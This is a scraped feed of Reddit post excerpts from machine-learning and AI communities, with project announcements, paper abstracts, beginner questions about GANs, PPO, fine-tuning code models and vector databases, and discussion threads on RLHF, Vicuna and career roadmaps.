    https://preview.redd.it/p70yknwm15gb1.png?width=1901&format=png&auto=webp&s=7417914304cc23d6691653cd73396bd600a44b0a Hey Guys, I am happy to share with you a web application I've working on the past couple weeks. It's a tool to predict the outcome of soccer games in minor football leagues. Named ScoreCast, it predicts the outcome of soccer games in six minor leagues: Serie A Brazil, Serie B Brazil, Primera Division Argentina, J1 League Japan, Eliteserien Norway, and Veikkausliiga Finland. Since I am really interested in football analytics and also not being able to find many online tools for predicting the outcomes in minor soccer leagues, I had the need to create ScoreCast to have it as a tool for guidance on this field. If you want to check it out, here are some links that might help: Github: https://github.com/Costasgk/ScoreCast The App: https://score-cast-3a6cb8fe5c50.herokuapp.com/ Medium: https://medium.com/@costascg9/scorecast-a-tool-for-predicting-football-game-outcomes-in-minor-leagues-666f7acca3a Thank you for your time! submitted by /u/Costas_8 [link] [comments]  ( 9 min )
    [P] Struggling with Audio Enhancement using GANs - Any Suggestions?
    I'm working on a Python project that aims to transform phone-quality acoustic guitar recordings into studio-like ones. My approach involves using a Generative Adversarial Network (GAN) with two components: a Generator and a Discriminator. Here's a quick rundown of my process: Data Loading & Preprocessing: Convert acoustic guitar recordings to spectrograms and split into training and validation sets. Generator: Neural network trained to create high-quality studio recording spectrograms from low-quality inputs. Discriminator: Another neural network trained to differentiate between real and generator-created high-quality spectrograms. Training: Train the Generator and Discriminator against each other in a cat-and-mouse game of deception and detection. Audio Enhancement: Feed the Generator a low-quality spectrogram, get a high-quality one out, and convert it back into an audio file. I'm reaching out because I'm not entirely satisfied with the quality of the output. The enhanced audio is just rhythmic noise, what am i missing with generating the audio? I'm wondering if anyone here has experience with GANs for audio enhancement and can offer some advice. Is there something I might be missing in my approach? Are there any tips or tricks you've found helpful in your own work? And yes, I'm prepared for you to tear me a new one. Bring on the constructive criticism! git repo: https://github.com/Gabeiscool420/AURAL_GAN-predictive_model/blob/main/requirements.txt submitted by /u/S0UNDSAGE [link] [comments]  ( 9 min )
    [D] Parametric Development
    I wanted to share with you an approach to software development that I've been exploring recently: Parametric Development. This involves using artificial intelligence (AI) models, including GPT-like models, BART-like models, and other specialized transformer models, to assist in writing, debugging, and documenting code. My journey with programming is a bit unconventional. I took one year of computer science at university and learned how to write "Hello, World!" in TurboPascal from an old university textbook in late primary school. That was the extent of my programming experience until about a month ago. Since then, I've been using AI models to write code for my ideas, as I don't have extensive programming skills. These AI models have written and debugged every single line of code in my pro…  ( 9 min )
    [D] CIKM 23 Notification
    Today is the day of paper notification according to the CFP. Has anyone received the notification? submitted by /u/Alliswell2257 [link] [comments]  ( 8 min )
    [Discussion] Automated unstructured -> structured OSS library - give me your requirements
    Hey folks, i'm a data engineer in the traditional space for over 10 years. I am working on a library for easy transitioning unstructured to structured data. The use case is that I would regularly build a ton of python pipelines but without schema management, they would be a pain to maintain. 2y ago I started working on this library https://pypi.org/project/dlt/, and now it''s ready to help people like myself to load json to db/parquet/iceberg with a 1-liner with schema evolution. Declarative loading possible. I am looking for the following feedback - What would make this more useful in the ML space? Specific destinations? Are the docs usable or do you expect something different? let me know what. For example, we are adding Weaviate vector db and Athena + Iceberg in the next weeks. - any features you are missing? or any ideas that you think would be helpful? - are the docs relatable, understandable? what are you missing? ​ docs are here, you can find colab demos under getting started: https://dlthub.com/docs/intro submitted by /u/Thinker_Assignment [link] [comments]  ( 9 min )
    [D] Validate my approach to do Unsupervised Fine tuning of Code LLMs like CodeT5+ and Starcoder with custom code base
    Any suggestions on how to prepare code data to fine tune a code LLM in an unsupervised way or is it even possible? For example: Task: Code summarisation with custom code base (with no summaries) Let's assume that this code base is unique and a pre-trained model is giving unsatisfactory results. Now to fine tune there are three options, 1. Manually prepare summaries for a portion of the code and fine tune 2. Find a similar code base which has the labels (docstring) and fine tune 3. Mask some portions of the code randomly and give as input and output will be the masked portions Options 1 and 2 don't seem feasible for a production environment. The reasoning behind option 3 is that with no availability labels, the model will learn the patterns in the code base and provide a better summarisation with its pre-trained knowledge. I tried the option 3 with CodeT5+ fine tuning. The format of input and output was as follows Input: def __init__(self, text, font): self._text = text self._font = font def get_text(self): || def set_text(self, value): self._text = value``` Output: return self._text submitted by /u/dire_wolf_cookie [link] [comments]  ( 9 min )
    [Project] Enquiry for individuals working with Natural Language Processing
    Hello Everyone . Myself Harsha. I am final year Masters student in Berlin pursuing my thesis currently. For my thesis "Natural Language Processing in Data transfer across documents in Commidity Trading Industry" i am in search for professionals who are working with NLP currently in companies who can lend me 10 minutes of their time for a personal interview. THIS WOULD BE A LOT HELPFUL. please do let me know. Thanks in advance submitted by /u/Aimerforlife [link] [comments]  ( 8 min )
    [D] Why is tflite c++ so hard to compile?
    Has anyone actually done this and can dm me? I am trying to incldue the interpreter to run inference with a simple c++ program and a custom trained model. But I cannot figure out how to update include paths and cannot see any resources online. submitted by /u/Agreeable_Fee477 [link] [comments]  ( 8 min )
    From Sparse to Soft Mixtures of Experts [R]
    submitted by /u/we_are_mammals [link] [comments]  ( 8 min )
    [D] Why is it so hard to rent GPU time?
    I'm just a new guy, so take it easy please :) - Is it just because I'm just signing up for the cloud compute services? Will this get easier? I have a 3090 so I can do quite a bit in my home office, but my clients need some larger models now, and I've been trying to pay for instances with an A100 at least. It's been really a lot of push-back...is this normal? What can I do to get access to larger GPUs sooner? I have tried paperspace, aws, googlecloud, llambda, linode...would love to know some other services or tools you folks use to get work done. Thank you for your time. Interested to hear how you spin up high VRAM environments for projects. submitted by /u/UrbanSuburbaKnight [link] [comments]  ( 9 min )
    [D] milvus search filtering based on string
    While doijg vector search on embeddings i wanted to apply a filter based on a column value in milvus. As milvus supports boolean value to apply the filter (or hybrid search) Can someone help me with the boolean code snippet which will apply the filter based on a string value of a field Ex. I'm doing vector search on the field "context" and need to filter the result based on a specific "filename" string value to further filter and improve the results I'm using milvus 2.2 submitted by /u/adiraat [link] [comments]  ( 8 min )
    [R] Proof of Lemma 5.1 in 'Bayesian Design Principles for Frequentist Sequential Learning'
    This paper won ICML 2023 outstanding paper award, its idea is really interesting and I want to follow the details. Lemma 5.1 significantly paves towards the core theoretical results, but the paper does not provide a formal proof. I do not have a deep background on game theory, maybe the proof is obvoius to the professional. ​ https://preview.redd.it/ih6u3wiyr0gb1.png?width=464&format=png&auto=webp&s=cc895b9701e3600213825c34ef3b542f53d65233 I undersand this lemma tries to construct a Nash equilibrium upon the additional assumption of strong convexity, but why this maximin solution is a Nash equilibrium? Very appreciated if someone provide some hint. submitted by /u/Kyeon-G [link] [comments]  ( 9 min )
    [D] Any noticeable work regarding the effect of a language model's vocabulary or tokenizer?
    Hi. I'm trying to build a text encoder for a specific domain and want to know what sort of papers there are out there that I should take note of. I may be wrong but it seems that these days ever since LLMs started taking over the choice of tokenizer has become trivial and therefore doesn't warrant much discussion. One paper that I remember reading a while ago talked about the effect of using a custom-made vocabulary for the biomedical domain (Pretrained Language Models for Biomedical and Clinical Tasks: Understanding and Extending the State-of-the-Art (Lewis et al., 2020)). Are there any other works that I should take note of? Open to any suggestions. submitted by /u/Seankala [link] [comments]  ( 9 min )
    [R] Scaling Relationship on Learning Mathematical Reasoning with Large Language Models - Zheng Yuan et al Alibaba Damo Academy
    Scaling Relationship on Learning Mathematical Reasoning with Large Language Models Paper: https://arxiv.org/abs/2308.01825 GitHub: https://github.com/OFA-Sys/gsm8k-ScRel Abstract: Mathematical reasoning is a challenging task for large language models (LLMs), while the scaling relationship of it with respect to LLM capacity is under-explored. In this paper, we investigate how the pre-training loss, supervised data amount, and augmented data amount influence the reasoning performances of a supervised LLM. We find that pre-training loss is a better indicator of the model’s performance than the model’s parameter count. We apply supervised fine-tuning (SFT) with different amounts of supervised data and empirically find a log-linear relation between data amount and model performance, and we find better models improve less with enlarged supervised datasets. To augment more data samples for improving model performances without any human effort, we propose to apply Rejection sampling Fine-Tuning (RFT). RFT uses supervised models to generate and collect correct reasoning paths as augmented fine-tuning datasets. We find with augmented samples containing more distinct reasoning paths, RFT improves mathematical reasoning performance more for LLMs. We also find RFT brings more improvement for less performant LLMs. Furthermore, we combine rejection samples from multiple models which push LLaMA-7B to an accuracy of 49.3% and outperforms the supervised fine-tuning (SFT) accuracy of 35.9% significantly. ​ Head figure Pretrain loss vs SFT and ICL submitted by /u/GanjinZero0 [link] [comments]  ( 9 min )
  • Open

    Understanding the concept of Variance in Reinforcement Learning
    I was trying to understand Generalized Advantage Estimation from here and came across the following paragraph - ​ https://preview.redd.it/l41x655ea6gb1.png?width=778&format=png&auto=webp&s=ffd266c0355a03e1c98ea6de89ca2fc78ed27fd1 I understood the reason why there could be high bias while bootstrapping the advantage. But why does $A_t^{\inf}$ have high variance. Aren't bias and variance concepts related to estimation by an estimator? While calculating $A_t^{\inf}$, we are literally using the reward values obtained from the environment and therefore there is no estimation involved. Could someone please help me with this? ​ submitted by /u/Academic-Rent7800 [link] [comments]  ( 8 min )
    Interesting RL environments in github
    I am searching for an interesting but not too complex game envs. Preferably with selfplay but should not be very simple nor standard atari like. Any recommendations? submitted by /u/Trrrrr88 [link] [comments]  ( 8 min )
    Updating custom output layers of an LSTM network
    I have a text generation task learning to predict the next word with an LSTM network with multiple output layers. After the generation of a sentence has finished, I calculate a reward for the whole sentence and try to update the output layers participated in the generation (contributing layers get the calculated reward value, others get 0). My problem is that even if I update only the selected output layers, it seems that other layer's weights got updated instead. I have a minimized example with dummy data to present the problem: import random import numpy as np import tensorflow as tf from keras.layers import Input, LSTM, Dense, Embedding from keras.utils import pad_sequences from tensorflow.keras.models import Model def policy_gradient_loss(y_true, y_pred): return tf.reduce_mean(tf.m…  ( 9 min )
    Why am I unable to reshape my observation with `TransformObservation` wrapper?
    I am trying to reshape my `Breakout` vectorized environment observations to have the shape `num_envs*frames, height, width, channels`. Currently, the shape is `(3, 4, 210, 160, 3)` and basically I'd like it to be `(3*4, 210, 160, 3)`. Based on the documentation, the `TransformObservation` should solve this problem for me, but it is not doing that. ​ Here's my code - import gym import numpy as np from gym.wrappers import AtariPreprocessing, FrameStack, GrayScaleObservation, TransformObservation if __name__ == '__main__': def reshape_image(obs): # Assuming the original observation is an image with shape (height, width, channels) new_obs = np.array(obs).reshape(12, 210, 160, 3) return new_obs env = gym.vector.make("ALE/Breakout-v5", num_envs=4) env = FrameStack(env, num_stack=3) env = TransformObservation(env, reshape_image) env.reset() observation, reward, terminated, done = env.step(env.action_space.sample()) print("observation = ", env.observation_space.shape) submitted by /u/Academic-Rent7800 [link] [comments]  ( 9 min )
  • Open

    One-Minute Daily AI News 8/4/2023
    AI.com Now Belongs to Elon Musk. The URL previously belonged to OpenAI, but, somehow, it’s now a landing page for Musk’s AI venture.[1] Samsung, Hyundai back AI startup Tenstorrent: Everyone wants competition to Nvidia, says CEO Keller.[2] Google’s AI-powered Search Generative Experience is getting a big new feature: images and video. If you’ve enabled the AI-based SGE feature in Search Labs, you’ll now start to see more multimedia in the colorful summary box at the top of your search results.[3] White Castle wants to roll out AI-enabled voices to over 100 drive-thrus by 2024 in the hope that people can get their sliders faster with maybe less arguing with someone over speakers.[4] BushAICave.com Sources: [1] https://gizmodo.com/ai-dot-com-now-belongs-to-elon-musk-1850707248 [2] https://www.zdnet.com/google-amp/article/samsung-hyundai-back-ai-startup-tenstorrent-everyone-wants-competition-to-nvidia-says-ceo-keller/ [3] https://www.theverge.com/2023/8/2/23817107/google-ai-search-generative-experience-videos-links [4] https://www.theverge.com/2023/8/2/23817406/white-castle-soundhound-ai-sliders submitted by /u/Excellent-Target-847 [link] [comments]  ( 8 min )
    Is singularity net good or net bad?
    I am curious whether people consider a singularity event to be a net positive or a net negative? Are you "pro" or "con"? Please explain your reasoning. submitted by /u/kecepa5669 [link] [comments]  ( 8 min )
    Comparing Vicuna to alternative LLMs like ChatGPT, LLaMA, and Alpaca
    I wrote an in-depth article exploring Vicuna as an alternative to competitor LLMs like ChatGPT, Alpaca, and LLaMA for chat applications. I based it off the research data on the LMSYS.org website and the Github repo for the project. Key findings: Vicuna achieves over 90% of ChatGPT's conversational quality based on benchmarks, despite being smaller in size. It significantly outperforms other open models like LLaMA and Alpaca. Vicuna is freely available for non-commercial use under a research license. For startups and developers, Vicuna provides an decent open-source alternative to proprietary conversational AI. It shows the potential of transfer learning from foundation models like LLaMA. Overall, Vicuna represents a promising development in democratizing access to leading conversational intelligence through its high performance, permissive licensing, and open availability. You can read the full article here. I also publish all these articles in a weekly email if you prefer to get them that way. submitted by /u/Successful-Western27 [link] [comments]  ( 9 min )
    AI — weekly megathread!
    This week in AI - provided by aibrews.com feel free to follow their newsletter News and Insights In an innovative clinical trial, researchers at Feinstein Institutes successfully implanted a microchip in a paralyzed man's brain and developed AI algorithms to re-establish the connection between his brain and body. This neural bypass restored movement and sensations in his hand, arm, and wrist, marking the first electronic reconnection of a paralyzed individual's brain, body, and spinal cord [Details]. IBM's watsonx.ai geospatial foundation model – built from NASA's satellite data – will be openly available on Hugging Face. It will be the largest geospatial foundation model on Hugging Face and the first-ever open-source AI foundation model built in collaboration with NASA [Details]. Go…  ( 10 min )
    Should I continue for a PhD after I get an accelerated masters if I want to get into AI?
    My main goal isn’t mainly just the data science / machine learning part or AI, but more of the Computer Vision, Robotics, NLP, and I guess research oriented aspects of AI. If I want to purse that versus DS, should I also get a PhD? Many jobs I’ve been looking at seem to require a PhD as a prereq while some don’t even mention it submitted by /u/davididp [link] [comments]  ( 8 min )
    Review my book of AI Self Portraits
    I'm looking for reviewers for my book of AI Self Portraits that's about to come out on Amazon on the 21st. AI journalist Elle Farrell-Kingsley said: “This collection of AI self-portraits is truly intriguing . . . a must-read for anyone curious about the intersection of art and artificial intelligence.” Send me a DM and I'll send you the whole thing. If you're well known (or should be) I might put what you have to say on the back cover! submitted by /u/KarneyHatch [link] [comments]  ( 8 min )
    ElevenLabs TTS (paid/free)
    I'm seeking a text-to-speech solution that provides quality output comparable to ElevenLabs presets. While I'm open to a base rate payment, I find ElevenLabs' character limit frustrating. It's important that the solution is user-friendly. Additionally, I have a PC with a 1070ti as i read running such programms could require a GPU. Please recommend a suitable substitute. submitted by /u/Ainz-Ol-Gon [link] [comments]  ( 8 min )
    Top 20 Artificial Intelligence AI Companies In The World
    submitted by /u/Techasoft16 [link] [comments]  ( 8 min )
    (Very) Roughly estimating the singularity date
    www.daystosingularity.com is a (very) rough estimation of the remaining time before technology achieves a pivotal moment when our civilization undergoes a profound transformation due to the exponential growth of technology and the emergence of superintelligent machines that improve themselves. Although the Singularity is not predicted to happen on a specific date, all at once, the estimated date can be seen as the center of a bell Gaussian curve of the estimation, with that center designated as the possible date that future historicists will pose as the beginning of a new historical period. Technological Singularity poses risks that include the emergence of superintelligent AI outpacing human control, loss of control over AI’s actions and behavior, unintended consequences of advanced AI systems, massive job displacement, wealth inequality, existential risks like human extinction, ethical concerns, dependency on technology, and a decline in human skills and abilities due to excessive reliance on AI. Not funny. We use the definition of technological singularity. This milestone is predicted to occur after AGI (Artificial General Intelligence) is reached. Please check our definitions and methodology here. Predicting the singularity is challenging and uncertain. Current estimates should be viewed cautiously.The estimated date is being continuously updated. We ponder a relevant list of curated expert predictions and contributing factors on when the singularity will take place. Any suggestion for perfecting the method is highly appreciated. submitted by /u/Powerful-Pumpkin-938 [link] [comments]  ( 9 min )
  • Open

    Software and the Allee effect
    The Allee effect is named after Warder Clyde Allee who added a term to the famous logistic equation. His added term is highlighted in blue. Here N is the population of a species over time, r is the intrinsic rate of increase, K is the carrying capacity, and A is the critical point. If you […] Software and the Allee effect first appeared on John D. Cook.  ( 5 min )
    Solved problems becoming unsolved
    “That’s a solved problem. So nobody knows how to solve it anymore.” Once a problem is deemed “solved” interest in the problem plummets. “Solved” problems may not be fully solved, but sufficiently solved that the problem is no longer fashionable. Practical issues remain, but interest moves elsewhere. The software written for the problem slowly decays. […] Solved problems becoming unsolved first appeared on John D. Cook.  ( 5 min )
    The cobbler’s son
    There’s an old saying “The cobbler’s son has no shoes.” It’s generally taken to mean that we can neglect to do for ourselves something we do for other people. I’ve been writing a few scripts for my personal use, things I’ve long intended to do but only recently got around to doing. I said something […] The cobbler’s son first appeared on John D. Cook.  ( 5 min )
  • Open

    Optimize data preparation with new features in AWS SageMaker Data Wrangler
    Data preparation is a critical step in any data-driven project, and having the right tools can greatly enhance operational efficiency. Amazon SageMaker Data Wrangler reduces the time it takes to aggregate and prepare tabular and image data for machine learning (ML) from weeks to minutes. With SageMaker Data Wrangler, you can simplify the process of […]  ( 10 min )
    Index your Alfresco content using the new Amazon Kendra Alfresco connector
    Amazon Kendra is a highly accurate and simple-to-use intelligent search service powered by machine learning (ML). Amazon Kendra offers a suite of data source connectors to simplify the process of ingesting and indexing your content, wherever it resides. Valuable data in organizations is stored in both structured and unstructured repositories. An enterprise search solution should […]  ( 13 min )
    Use the Amazon SageMaker and Salesforce Data Cloud integration to power your Salesforce apps with AI/ML
    This post is co-authored by Daryl Martis, Director of Product, Salesforce Einstein AI. This is the second post in a series discussing the integration of Salesforce Data Cloud and Amazon SageMaker. In Part 1, we show how the Salesforce Data Cloud and Einstein Studio integration with SageMaker allows businesses to access their Salesforce data securely […]  ( 13 min )
    Bring your own AI using Amazon SageMaker with Salesforce Data Cloud
    This post is co-authored by Daryl Martis, Director of Product, Salesforce Einstein AI. We’re excited to announce Amazon SageMaker and Salesforce Data Cloud integration. With this capability, businesses can access their Salesforce data securely with a zero-copy approach using SageMaker and use SageMaker tools to build, train, and deploy AI models. The inference endpoints are […]  ( 7 min )
  • Open

    AI’s transformative role in software testing and debugging
    AI has revolutionized software development. AI has transformed software testing and debugging by automating mundane tasks and solving complex problems. Manual testing no longer requires hours and resources. AI has revolutionized testing, code quality, and development time. This article explores AI’s profound impact on software testing and debugging, including its benefits, risks, and how it… Read More »AI’s transformative role in software testing and debugging The post AI’s transformative role in software testing and debugging appeared first on Data Science Central.  ( 23 min )
    Generative AI megatrends: implications of GPT-4 drift and open source models – part one
    In this two part discussion, we will discuss two related generative AI megatrends Backgroumd A recent paper How Is ChatGPT’s Behavior Changing over Time? from Stanford University and UC Berkeley claims that the performance of GPT-4 has drifted over time. To make this claim, specific tasks were evaluated (ex: accuracy of maths) and the results… Read More »Generative AI megatrends: implications of GPT-4 drift and open source models – part one The post Generative AI megatrends: implications of GPT-4 drift and open source models – part one appeared first on Data Science Central.  ( 19 min )
  • Open

    Baby onesie designs
    A reader wrote in a while ago with a suggestion: they were about to have a baby and wondered if I could use AI to come up with some new ideas for baby onesies. I can't find the letter any more, and I don't remember how  ( 6 min )
    Bonus: more baby onesie ideas
    AI Weirdness: the strange side of machine learning  ( 2 min )
  • Open

    NVIDIA CEO Jensen Huang Returns to SIGGRAPH
    One pandemic and one generative AI revolution later, NVIDIA founder and CEO Jensen Huang returns to the SIGGRAPH stage next week to deliver a live keynote at the world’s largest professional graphics conference. The address, slated for Tuesday, Aug. 8, at 8 a.m. PT in Los Angeles, will feature an exclusive look at some of Read article >  ( 4 min )

  • Open

    "Skill-it! A Data-Driven Skills Framework for Understanding and Training Language Models", Chen et al 2023
    submitted by /u/gwern [link] [comments]  ( 8 min )
    How do I add Entropy to a PPO algorithm?
    Can someone please help with this question? I have added my understanding of this problem to the question, but I suspect that it may be flawed. submitted by /u/Academic-Rent7800 [link] [comments]  ( 8 min )
    How to get better at programming when I have BP disorder and on ADHD spectrum?
    Hi I am 30F, currently working on my thesis. I like the idea of creating logics and then implementing them using coding. I switched my major from engineering to CS bcuz I was very much inspired by AI and all. But the issue is I have bipolar disorder and I am also on ADHD spectrum so self paced online courses to learn programming are very hard for me. I am also barely managing to pay tuition so I can't pay like $100+ for a course to learn. I know it's kinda stupid but is there any way I can make my programming skills better and get better at creating/modifying algorithms? submitted by /u/Kucing_koyangi [link] [comments]  ( 9 min )
  • Open

    What would be the initial costs of developing a text-to-video AI? How would be the quality of this AI?
    I was wondering if this would be super expensive or not. The cost to develop GPT-3 was about $4 millions according to some resources online. Would the cost to develop the first version of a text-to-video AI the same? Around $5M? Is in this value included the salaries of the employees or $5M is just the amount used to train the AI? Any answer is appreciated. Thanks in advance. submitted by /u/Claud1ao [link] [comments]  ( 8 min )
    Creating point cloud videos from arbitrary RGB videos
    submitted by /u/berkanzzzz [link] [comments]  ( 8 min )
    what source would you recommend a 15yo to learn how to make a simple neural network?
    It's been years i've always been interested in AI. i tried to follow a few videos on yt. The best resource i could find was the "Neural Networks from scratch" YouTube playlist. But sadly, it interrupts in the middle, and i don't think it will ever be continued. I have programming knowledge, i made a bunch of very small project in python, and currently it's the language i'm most comfortable with. I lack of math knowledge, i struggle with calculus since i never studied it at school, the furthest i got with school was first degree equations. by myself i studied some math i didnt do in school, but i still suck at math. I wonder if i can start now or i should wait to study calculus at school. anyway, i'd love to get linked to a source for me to learn NNs from scratch. submitted by /u/Jealous-Bad1742 [link] [comments]  ( 9 min )
    Seeking suggestions for exciting and intriguing capstone project ideas.
    Hey everyone, I'm in my final year of B.Tech, majoring in data science. Currently, I'm facing some challenges in choosing a topic for my capstone project. Lately, I've been really intrigued by graph databases and have been diving into learning Neo4j. I'm specifically interested in finding project ideas that allow me to combine machine learning, particularly neural networks, with graph databases. During my research, I came across GNNs (Graph Neural Networks) and PINNS (Physics-Informed Neural Networks). I'm eager to hear any suggestions for unique project topics that instantly spark curiosity just by their title. Feel free to share any ideas or topics; I welcome all suggestions. Thanks in advance! submitted by /u/EmergencyAside6551 [link] [comments]  ( 8 min )
    Devar, a technology company, is getting ready to deploy the world's first generative AI neural network for augmented reality (AR).
    submitted by /u/Tycoonstory2020 [link] [comments]  ( 8 min )
    AudioCraft: A simple one-stop shop for audio modeling
    submitted by /u/nickb [link] [comments]  ( 8 min )
  • Open

    [D] [Discussion] What would be the initial costs of developing a text-to-video AI? How would be the quality of this AI?
    I was wondering if this would be super expensive or not. The cost to develop GPT-3 was about $4 millions according to some resources online. Would the cost to develop the first version of a text-to-video AI the same? Around $5M? Is in this value included the salaries of the employees or $5M is just the amount used to train the AI? Any answer is appreciated. Thanks in advance. submitted by /u/Claud1ao [link] [comments]  ( 8 min )
    Roadmap for mastering machine learning [D]
    Hey, first of all, I want to learn how to use nlp, cnn etc. So i think these will come under deep learning. I wanna master deep learning. This whole dl and ml is so confusing. I'll list out some courses, can y'all suggest the order and what courses to follow Andrew ng's ml specialization Andrew ng's dl specialization Statquest's whole machine learning playlist (around 95 videos) Fast.ai book CS 229 stanford CS 231n stanford MIT intro to deep learning Pytorch for dl and ml by freecodecamp DL with pytorch You can give me suggestions too Tysm for helping submitted by /u/Infnite_Coder [link] [comments]  ( 9 min )
    [D] [P] [R] Advice for picking R Studio or Spyder
    Hello ML family, I need some urgent advice for my dissertation. I intend to perform market value price prediction of a footballer in the transfer market and I'm not sure if I should pick R Studio or Python. I'm comfortable with both languages and intend to use any one for model comparison. I'll be comparing an ANN model and SVR for showing which is better and why. I need to know which editor will be faster in the long run since my data will be expanding and so will the analysis overtime. I've heard a lot of complaints about spyder slowing down during execution whereas R Studio is much faster however, deep learning is much better in Python. This is what I've read up, I'm new to both languages but know my way around both just need expert advice on picking one track. Please and Thank you to you all. 🙏 submitted by /u/RaunaqBani [link] [comments]  ( 9 min )
    [D] Embedding Ethical Priors into AI Systems: A Bayesian Approach
    Abstract Artificial Intelligence (AI) systems have significant potential to affect the lives of individuals and societies. As these systems are being increasingly used in decision-making processes, it has become crucial to ensure that they make ethically sound judgments. This paper proposes a novel framework for embedding ethical priors into AI, inspired by the Bayesian approach to machine learning. We propose that ethical assumptions and beliefs can be incorporated as Bayesian priors, shaping the AI’s learning and reasoning process in a similar way to humans’ inborn moral intuitions. This approach, while complex, provides a promising avenue for advancing ethically aligned AI systems. ​ Introduction Artificial Intelligence has permeated almost every aspect of our lives, often making de…  ( 26 min )
    [D] RLHF Preference Tuning: How Things May Go Wrong
    As ChatGPT's performance takes a slight dip, LLaMA-2 uncensored opens new doors by being fully open-sourced, recent studies unveil "universal" adversarial attacks capable of disrupting both open-source language models and RLHF-tuned ones like ChatGPT, Claude, Bard, and co. Despite all this, RLHF still stands its ground as the de facto industry-standard approach to aligning LLMs with human preference. Yet as every week slips by, the more we unmask the limitations of RLHF. In fact, there are instances where RLHF seems to deteriorate certain LLM features it pledged to enhance, like hallucinations. This field is evolving fast, and there's always more to learn. I took some effort to write a short blog post where I delve into the most recent findings on the shortcomings of RLHF. Link in the comments below. Let me know what you think about it! Cheers submitted by /u/mrx-ai [link] [comments]  ( 9 min )
    [P] Epsilla: Another open source vector database
    Hi everyone! I'm excited to share Epsilla, an open-source vector database! Under the hood, we implemented the state-of-art ANN index algorithm from the academia (SpeedANN) that leverages intra-query parallel graph traversal, which outperforms HNSW by 5x on high precision query latency on medium size (1M) vector space and outperforms HNSW by 50 times on large-scale vector search. In addition, we also made a few design choices on our database interface and architecture based on our previous database experience at TigerGraph, we would love to hear what our users think about these choices We just started 3 weeks ago and it's still in the very early stages, we wanted to get your feedback and work together to shape our vector database features. Let us know what you think and what you'd like to see! https://github.com/epsilla-cloud/vectordb https://epsilla-inc.gitbook.io/epsilladb/quick-start https://www.epsilla.com/ submitted by /u/songrenchu [link] [comments]  ( 9 min )
    [D] Deciding which CNN model to go for for image classification/object detection
    Hello guys. I'd like to make an image classifier for the Kaggle landscape dataset (24K images and 34 classes) using transfer learning. I'm a little bit limited on resources to train the model so I'd like to have an understanding of which model is the better option for this specific task, however, I'm struggling to find info on that and how to tune hyperparameters given that I've decided on the model architecture. So far I've seen people referring to VGG and ResNet models as the better option for image classification tasks on medium sized datasets, but I'd like to see the argumentation behind that too. I've also heard of a practice of training different model candidates for a few epochs and choosing the one that does better (this only shows which model converges faster on the data, correct me if I'm wrong). I'd also like to read info on hyperparameter tuning such as batch size, the amount of layers to unfreeze etc. but can't seem to find any explanation that wasn't really surface-level. If you know any articles/videos on this topic I'd greatly appreciate you sharing the links. TLDR; Need links to articles/videos about choosing the model architecture for transfer learning and tuning hyperparameters for the model. submitted by /u/Humble_Examination13 [link] [comments]  ( 9 min )
    [R] Beginner's question
    Hello There, I am very noob in data science area, but I want learn about it, I want to do a project to detect what type of question have the user, E.g support, information,etc, I understand that I need to train a model, but where do I start? submitted by /u/Constantine1396 [link] [comments]  ( 8 min )
    [D] Concept of Dynamic Weights in ML
    Hello all, Placing this entry here to see what peoples thoughts on the concept of dynamic weights applied to ML are. Ie. Instead of a manual adjustment of the weights via an algorithm such as gradient descent, the weights are freed and have applied motion dynamics to them. Thanks for your time, Tyler submitted by /u/LiveBacteria [link] [comments]  ( 8 min )
    [P] Pinecone Precision Issues
    Hello all, Currently I'm utilising Pinecone as a vector store database for euclidean and cosine queries. We are facing an issue with Pinecone utilising 32 bit single precision when taking in floats. This is causing our data input to become skewed. Anyone have advice on how to resolve this? Alternative products? Exploring possibly configuring a Redis server to handle higher precision. Thanks in advance for your time, Tyler submitted by /u/LiveBacteria [link] [comments]  ( 8 min )
    [Project] Are you interested in a career using ML for social impact?
    I'm a software engineer who has been looking for a job in AI/ML for some time. Last month I attended the UN's AI For Good Global Summit and discovered an amazing community of like-minded professionals and academics working towards just this. Speaking with many others in a similar position I've recently launched aiforgoodjobs.com which curates roles in AI at world leading companies tackling climate change, education, healthcare and many other important impact areas in support of the UN's Global Goals. I hope this might be a valuable resource for those looking down a similar path - if you would like hiring managers to reach out to you directly for relevant roles you're warmly invited to join our candidate database Any ideas/feedback also very gratefully received! submitted by /u/aiforgood_jobs [link] [comments]  ( 9 min )
    [P] collab on a web extension using NLP
    on the lookout for interested teammates to collaborate on a project to do with web extensions and NLP. If you think you can jam to this, or are just starting out, this can be the launchpad you needed. submitted by /u/drunk3n_s4ilor [link] [comments]  ( 8 min )
    [D] Where can I publish my images and Time Series dataset?
    Hey there. I have curated huge amount of high quality images for binary classification and also a time series data about it. I made the dataset specifically For some project of mine, and since it's completed right now, I want to make the dataset opensource and also potentially write a short review paper on it kind of to give an idea about data. Any particular website/journal I can publish my dataset and paper at? Any idea? submitted by /u/C0R0NA_CHAN [link] [comments]  ( 8 min )
    [D] Roadmap for AI engineer (implementation of language models on premise)
    I worked for less than a year as a Data Engineer. I decided to look for other challenges and got a job as an AI engineer developing language models. The product of the company that hired me is related to data and metadata management. My tasks will be to introduce features to the product, including a chat function that will allow for asking questions about data. Other tasks will include research and proposing additional AI-related functionalities to the product (on premise). I have a two weeks left to start work and I need to prepare a bit. My job will involve implementing ready-made solutions and conducting research (high level - I need to implement valuable features and no one cares how). What are the most important things I should learn before starting work? First of all, I replicated a few applications from this blog: https://blog.streamlit.io/tag/llms/ Then I have focused on Langchain. I'm also in the middle of a course on Udemy about Next-Gen AI projects - Beginner friendly - Langchain, Pinecone - OpenAI, HuggingFace & LLAMA 2 models I need a roadmap that will guide me a bit. I'm looking for blogs/materials/courses that will give me practical knowledge in this matter. submitted by /u/International-Shirt5 [link] [comments]  ( 9 min )
    [P] Would you like to have a tool to make EDA efficiently?
    I’m looking for some input from the ML community. I find the exploratory analysis of my data somewhat cumbersome, I was wondering if other people have the same experience and if it is worth developing a tool to make this all work better. What tools do you use to do EDA? (Seaborn, Matplotlib, Plotly etc) On top of these tools, would you like to have a tool to make EDA more? In a perfect world, what would that look like? submitted by /u/catnamedred [link] [comments]  ( 8 min )
    [D] Stack Exchange alternatives
